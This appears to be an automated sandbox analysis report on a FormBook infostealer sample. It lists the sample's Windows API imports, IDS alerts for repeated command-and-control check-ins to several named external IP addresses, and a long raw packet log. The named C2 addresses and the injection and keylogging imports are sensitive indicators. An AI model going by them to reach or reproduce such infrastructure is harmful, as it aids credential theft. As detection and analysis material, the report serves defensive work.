                                                                KERNEL32.dllHeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetCurrentThread, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, DeleteCriticalSection, WaitForSingleObject, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, CloseHandle, GetLastError, GetFullPathNameW, SetCurrentDirectoryW, 
IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, RaiseException, InitializeCriticalSectionAndSpinCount, InterlockedDecrement, InterlockedIncrement, CreateThread, DuplicateHandle, EnterCriticalSection, GetCurrentProcess, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, HeapSize, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, SetFilePointer, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, HeapReAlloc, WriteConsoleW, SetEndOfFile, DeleteFileW, SetEnvironmentVariableA
USER32.dll | SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, DrawMenuBar, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, MonitorFromRect, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, CopyImage, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, UnregisterHotKey, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, DeleteMenu, PeekMessageW, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, CharLowerBuffW, GetWindowTextW
GDI32.dll | SetPixel, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, GetDeviceCaps, CloseFigure, LineTo, AngleArc, CreateCompatibleBitmap, CreateCompatibleDC, MoveToEx, Ellipse, PolyDraw, BeginPath, SelectObject, StretchBlt, GetDIBits, DeleteDC, GetPixel, CreateDCW, GetStockObject, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, EndPath
COMDLG32.dll | GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll | GetAclInformation, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, InitiateSystemShutdownExW, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, SetSecurityDescriptorDacl, AddAce, GetAce
SHELL32.dll | DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll | CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
OLEAUT32.dll | RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, UnRegisterTypeLib, SafeArrayCreateVector, SysAllocString, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, QueryPathOfRegTypeLib, VariantCopy, VariantClear, CreateDispTypeInfo, CreateStdDispatch, DispCallFunc, VariantChangeType, SafeArrayAllocDescriptorEx, VariantInit
Language of compilation system | Country where language is spoken | Map
English | Great Britain |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-11T09:15:09.196526+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49970 | 104.21.28.65 | 80 | TCP
2025-01-11T09:15:11.466798+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49971 | 104.21.28.65 | 80 | TCP
2025-01-11T09:15:13.353106+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49972 | 104.21.28.65 | 80 | TCP
2025-01-11T09:15:22.542645+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49974 | 104.21.54.126 | 80 | TCP
2025-01-11T09:15:25.063268+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49975 | 104.21.54.126 | 80 | TCP
2025-01-11T09:15:27.725310+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49976 | 104.21.54.126 | 80 | TCP
2025-01-11T09:15:36.803552+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49978 | 69.57.163.64 | 80 | TCP
2025-01-11T09:15:39.337096+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49979 | 69.57.163.64 | 80 | TCP
2025-01-11T09:15:41.881785+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49980 | 69.57.163.64 | 80 | TCP
2025-01-11T09:15:50.716775+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49982 | 101.32.205.61 | 80 | TCP
2025-01-11T09:15:53.502097+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49983 | 101.32.205.61 | 80 | TCP
2025-01-11T09:15:55.731402+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49984 | 101.32.205.61 | 80 | TCP
2025-01-11T09:16:05.145567+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49986 | 103.159.36.66 | 80 | TCP
2025-01-11T09:16:07.695434+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49987 | 103.159.36.66 | 80 | TCP
2025-01-11T09:16:10.742732+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49988 | 103.159.36.66 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                Jan 11, 2025 09:15:16.069376945 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.069408894 CET4997380192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:16.069468975 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.069483042 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.069503069 CET4997380192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:16.069602013 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.069614887 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.069627047 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.069638014 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.069645882 CET4997380192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:16.069658041 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.069664001 CET4997380192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:16.069694042 CET4997380192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:16.069736004 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.069747925 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.069780111 CET4997380192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:16.070347071 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.070359945 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.070372105 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.070394993 CET4997380192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:16.070466995 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.070480108 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.070492983 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.070508003 CET4997380192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:16.070529938 CET4997380192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:16.111120939 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.111155033 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.111166000 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.111187935 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.111303091 CET4997380192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:16.155997038 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.156040907 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.156053066 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.156092882 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.156106949 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.156161070 CET4997380192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:16.156197071 CET4997380192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:16.156208038 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.156220913 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.156250000 CET4997380192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:16.156342030 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.156352997 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.156388998 CET4997380192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:16.156390905 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.156411886 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.156423092 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.156430960 CET4997380192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:16.156461000 CET4997380192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:16.156528950 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.156567097 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.156579018 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.156609058 CET4997380192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:16.156680107 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.156692982 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.156721115 CET4997380192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:16.156831980 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.156872988 CET4997380192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:16.156883955 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.156897068 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.156933069 CET4997380192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:16.157016039 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.157027960 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.157040119 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.157063961 CET4997380192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:16.157177925 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.157191038 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.157202959 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.157213926 CET4997380192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:16.157215118 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.157239914 CET4997380192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:16.157366991 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.157378912 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.157404900 CET4997380192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:16.157582045 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.157593012 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.157605886 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.157617092 CET4997380192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:16.157644987 CET4997380192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:16.157747030 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.157758951 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.157771111 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.157792091 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.157798052 CET4997380192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:16.157828093 CET4997380192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:16.157888889 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.157901049 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.157912970 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.157938957 CET4997380192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:16.158081055 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.158099890 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.158112049 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.158122063 CET4997380192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:16.158157110 CET4997380192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:16.158255100 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.158267021 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.158303976 CET4997380192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:16.158406019 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.158417940 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.158430099 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.158442020 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.158453941 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.158453941 CET4997380192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:16.158478022 CET4997380192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:16.158746958 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.158760071 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.158771038 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.158786058 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.158787966 CET4997380192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:16.158798933 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.158813000 CET4997380192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:16.158813953 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.158855915 CET4997380192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:16.159024954 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.159065008 CET4997380192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:16.159156084 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.159168959 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.159203053 CET4997380192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:16.159297943 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.159311056 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.159328938 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.159339905 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.159354925 CET4997380192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:16.159360886 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.159384012 CET4997380192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:16.159430027 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.159463882 CET4997380192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:16.159547091 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.159559011 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.159570932 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.159584045 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.159595013 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.159595966 CET4997380192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:16.159607887 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.159620047 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.159622908 CET4997380192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:16.159645081 CET4997380192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:16.160008907 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.160051107 CET4997380192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:16.160059929 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.160072088 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.160110950 CET4997380192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:16.160195112 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.160207987 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.160219908 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.160260916 CET4997380192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:16.199635983 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.199659109 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.199667931 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.199733019 CET4997380192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:16.199743986 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.199757099 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.199768066 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.199800014 CET4997380192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:16.199836969 CET4997380192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:16.244684935 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.244704008 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.244716883 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.244779110 CET4997380192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:16.244781017 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.244795084 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.244807005 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.244827032 CET4997380192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:16.244906902 CET4997380192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:16.244946003 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.244957924 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.244970083 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.245033026 CET4997380192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:16.245063066 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.245075941 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.245088100 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.245099068 CET4997380192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:16.245131016 CET4997380192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:16.245282888 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.245295048 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.245305061 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.245316029 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.245327950 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.245341063 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.245354891 CET4997380192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:16.245379925 CET4997380192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:16.245554924 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.245567083 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.245579958 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.245593071 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.245610952 CET4997380192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:16.245649099 CET4997380192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:16.245816946 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.245835066 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.245846987 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.245857954 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.245872021 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.245882034 CET4997380192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:16.245910883 CET4997380192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:16.246135950 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.246149063 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.246160984 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.246174097 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.246181965 CET4997380192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:16.246186972 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.246198893 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.246200085 CET4997380192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:16.246212006 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.246225119 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.246232986 CET4997380192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:16.246237993 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.246248960 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.246253014 CET4997380192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:16.246275902 CET4997380192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:16.246622086 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.246634007 CET8049973104.21.28.65192.168.2.7
